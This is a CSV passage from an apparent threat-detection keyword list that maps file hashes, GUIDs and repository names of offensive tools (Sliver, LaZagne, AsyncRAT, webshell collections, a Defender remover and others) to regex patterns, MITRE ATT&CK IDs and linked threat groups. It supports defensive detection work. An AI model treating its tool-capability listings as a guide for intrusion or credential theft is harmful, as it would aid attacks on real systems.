"*c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596*",".{0,1000}c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36927"
"*c390b9308e62a0f72802c6c7edbbe83e35d893aff632c0f332538ee263994c29*",".{0,1000}c390b9308e62a0f72802c6c7edbbe83e35d893aff632c0f332538ee263994c29.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36930"
"*c391bff39add68d2e9bd97ecfbc98850c2b80f831007df95704eedbc7e93617b*",".{0,1000}c391bff39add68d2e9bd97ecfbc98850c2b80f831007df95704eedbc7e93617b.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#filehash","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","36931"
"*c39d2a1c303847785a2a2af357dd948f5e6ec8194eb427c52a391db90de34f72*",".{0,1000}c39d2a1c303847785a2a2af357dd948f5e6ec8194eb427c52a391db90de34f72.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","36933"
"*c39d2a1c303847785a2a2af357dd948f5e6ec8194eb427c52a391db90de34f72*",".{0,1000}c39d2a1c303847785a2a2af357dd948f5e6ec8194eb427c52a391db90de34f72.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","36934"
"*c3a499f047b670e888a41b33749ffc9227b7b0bcc4e9f0882d272918ee3a17d1*",".{0,1000}c3a499f047b670e888a41b33749ffc9227b7b0bcc4e9f0882d272918ee3a17d1.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","#filehash","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","36936"
"*c3a9123c48f1c7024efc87373bf3471e9ee2e5dcdddce594764f21d3123f9cbd*",".{0,1000}c3a9123c48f1c7024efc87373bf3471e9ee2e5dcdddce594764f21d3123f9cbd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36937"
"*c3b029e9e7077164976a5f73399b07dd481ac41d524328f933a4cd62a36af679*",".{0,1000}c3b029e9e7077164976a5f73399b07dd481ac41d524328f933a4cd62a36af679.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36939"
"*c3b46bc3370bed3629df3e71ec1e85102b3920bff11c59ecb14bb45c80748d79*",".{0,1000}c3b46bc3370bed3629df3e71ec1e85102b3920bff11c59ecb14bb45c80748d79.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36940"
"*c3b6f81b25c7315d9a856dbc0ed1b129b2e0b39553fbd8a50a4145de6aa8ed42*",".{0,1000}c3b6f81b25c7315d9a856dbc0ed1b129b2e0b39553fbd8a50a4145de6aa8ed42.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","36942"
"*c3b7a095eb5860b4414e354becc07bf30a9133737164b89b689873ee9f9c7bd6*",".{0,1000}c3b7a095eb5860b4414e354becc07bf30a9133737164b89b689873ee9f9c7bd6.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","36943"
"*c3c1f7819a3b5421a91af3f491e61eb49506c0a573f1583d66f0f178891a1a74*",".{0,1000}c3c1f7819a3b5421a91af3f491e61eb49506c0a573f1583d66f0f178891a1a74.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","36945"
"*C3C49F45-2589-4E04-9C50-71B6035C14AE*",".{0,1000}C3C49F45\-2589\-4E04\-9C50\-71B6035C14AE.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#GUIDproject","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","36947"
"*C3C49F45-2589-4E04-9C50-71B6035C14AE*",".{0,1000}C3C49F45\-2589\-4E04\-9C50\-71B6035C14AE.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","36948"
"*C3C49F45-2589-4E04-9C50-71B6035C14AE*",".{0,1000}C3C49F45\-2589\-4E04\-9C50\-71B6035C14AE.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","36949"
"*c3c993b043322cac38d24d751229883227de36b38e2c8c1e0fc1ca0ff6f2fd9a*",".{0,1000}c3c993b043322cac38d24d751229883227de36b38e2c8c1e0fc1ca0ff6f2fd9a.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","#filehash","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","36950"
"*c3d0bfe503699cc1ed0452f3775e008b4e3983e21a2df33a8b47fe21555a4833*",".{0,1000}c3d0bfe503699cc1ed0452f3775e008b4e3983e21a2df33a8b47fe21555a4833.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36952"
"*c3d5848ea1ce007268f965e577fcdbbf343921d0d75c52b981499ef97a6e54e5*",".{0,1000}c3d5848ea1ce007268f965e577fcdbbf343921d0d75c52b981499ef97a6e54e5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36953"
"*c3e1e5a3e7b7e2d270582b233f94888de48d37642b9a6cdc019d2703aa1e4f0c*",".{0,1000}c3e1e5a3e7b7e2d270582b233f94888de48d37642b9a6cdc019d2703aa1e4f0c.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","36957"
"*c3e38acce6f3bca15fac349fd9f7eb41aa415a76fdf150bd0e75bc096467402f*",".{0,1000}c3e38acce6f3bca15fac349fd9f7eb41aa415a76fdf150bd0e75bc096467402f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36958"
"*c3e7919dd51fbeb12a7d6d4038a144cf4ae9c13793bdf137efb034dda6ed515b*",".{0,1000}c3e7919dd51fbeb12a7d6d4038a144cf4ae9c13793bdf137efb034dda6ed515b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36959"
"*c3f50756edbddbf72190cbdac5a0084b2c11e6aeab95b63d4da786547a693d73*",".{0,1000}c3f50756edbddbf72190cbdac5a0084b2c11e6aeab95b63d4da786547a693d73.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36961"
"*c3f5c77284e7440792843e51ec944d85bf0b3edf600b622832682a00e3c002d9*",".{0,1000}c3f5c77284e7440792843e51ec944d85bf0b3edf600b622832682a00e3c002d9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36962"
"*c3l3si4n/webtrufflehog*",".{0,1000}c3l3si4n\/webtrufflehog.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","1","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","36964"
"*c417429bfef774a5aad6d5a745b741f291fc0bd1b48514bfd4fbca9345e43384*",".{0,1000}c417429bfef774a5aad6d5a745b741f291fc0bd1b48514bfd4fbca9345e43384.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36973"
"*c4209649986c6f8b14571e8f08553cd89046c45a1a03d1ab1b69b03d4b745eb9*",".{0,1000}c4209649986c6f8b14571e8f08553cd89046c45a1a03d1ab1b69b03d4b745eb9.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36975"
"*c4375226178ff89c7d58598072dce4ab139c71fdf311071936d8331dc11cd90b*",".{0,1000}c4375226178ff89c7d58598072dce4ab139c71fdf311071936d8331dc11cd90b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36976"
"*c439db633c51838ba79ec999e0f5b4533379b94d2afeb5944fd15250fa5a86de*",".{0,1000}c439db633c51838ba79ec999e0f5b4533379b94d2afeb5944fd15250fa5a86de.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","36977"
"*c43b0658e94f065828af720b96f2d5f130d3929c7b37867897dc2512375559ad*",".{0,1000}c43b0658e94f065828af720b96f2d5f130d3929c7b37867897dc2512375559ad.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36978"
"*c44037f720d823a5d8ef14efde9fd0b9fcf5cd36cf0db159e1ae67ebac1e3b7e*",".{0,1000}c44037f720d823a5d8ef14efde9fd0b9fcf5cd36cf0db159e1ae67ebac1e3b7e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","36979"
"*c45986288840a01919c3b744499554d5a0608a2a109de0952b80303923cd3ce8*",".{0,1000}c45986288840a01919c3b744499554d5a0608a2a109de0952b80303923cd3ce8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36981"
"*c4614aa579c4b2bd0703218c1e8d5cab85c31a986278dc909edee7ca00687a3a*",".{0,1000}c4614aa579c4b2bd0703218c1e8d5cab85c31a986278dc909edee7ca00687a3a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36983"
"*c4645180927fea47c25236d1ef856476f818b04d048042577cc4793f4d1dc040*",".{0,1000}c4645180927fea47c25236d1ef856476f818b04d048042577cc4793f4d1dc040.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36984"
"*c4677593f3d871965055ff5c05412b2a6a0f70bd8d7bdc33c409bdc5669b925c*",".{0,1000}c4677593f3d871965055ff5c05412b2a6a0f70bd8d7bdc33c409bdc5669b925c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36985"
"*c46f4d7407e46fd600a3e400128c22a599bf7152068af8304fbd47c91ca39698*",".{0,1000}c46f4d7407e46fd600a3e400128c22a599bf7152068af8304fbd47c91ca39698.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","36988"
"*c47d02f06bc853b2917607af695be6f81013ffa31f4ff13e6bbf8ff835ee40ec*",".{0,1000}c47d02f06bc853b2917607af695be6f81013ffa31f4ff13e6bbf8ff835ee40ec.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36993"
"*c4913bf62aa78117b312fb37677f5b6d24bb96f22b72a3d0a8166d917f21a3d6*",".{0,1000}c4913bf62aa78117b312fb37677f5b6d24bb96f22b72a3d0a8166d917f21a3d6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36996"
"*c498592eebde7dec4227e1fe83002fca10beab096138e6d64278ef868a85900f*",".{0,1000}c498592eebde7dec4227e1fe83002fca10beab096138e6d64278ef868a85900f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36998"
"*c4abc4537dc209944170e16642c57b9c0d97d9de38557ee3ed3ac27ee68f9b91*",".{0,1000}c4abc4537dc209944170e16642c57b9c0d97d9de38557ee3ed3ac27ee68f9b91.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","37000"
"*c4ae18df3ccf102f9ae58af818678b96adb1fdc581ffc6625367ffeda420a33f*",".{0,1000}c4ae18df3ccf102f9ae58af818678b96adb1fdc581ffc6625367ffeda420a33f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37001"
"*c4b86273fcc42e5771b3983ef4150b9818f0038a7df0effb68ce1303c1459b73*",".{0,1000}c4b86273fcc42e5771b3983ef4150b9818f0038a7df0effb68ce1303c1459b73.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37003"
"*c4baa8972cd078acdbbddc5db31b73bdabb84b88cf06e133e7cb34fbc316761e*",".{0,1000}c4baa8972cd078acdbbddc5db31b73bdabb84b88cf06e133e7cb34fbc316761e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37005"
"*c4bb5669fe12e106bd6bb7a0fde51cf6e90d73bbd6e4143df40eb53d2f7da776*",".{0,1000}c4bb5669fe12e106bd6bb7a0fde51cf6e90d73bbd6e4143df40eb53d2f7da776.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","37006"
"*c4c624294090555e88aff480bc19f55ffcd1b51dda2dbf55fe35dde60b374fd1*",".{0,1000}c4c624294090555e88aff480bc19f55ffcd1b51dda2dbf55fe35dde60b374fd1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37007"
"*c4c99f7ff1976731ad0a4c3514f291f925f030c3c80d70d93ca98e3bf69a853e*",".{0,1000}c4c99f7ff1976731ad0a4c3514f291f925f030c3c80d70d93ca98e3bf69a853e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37010"
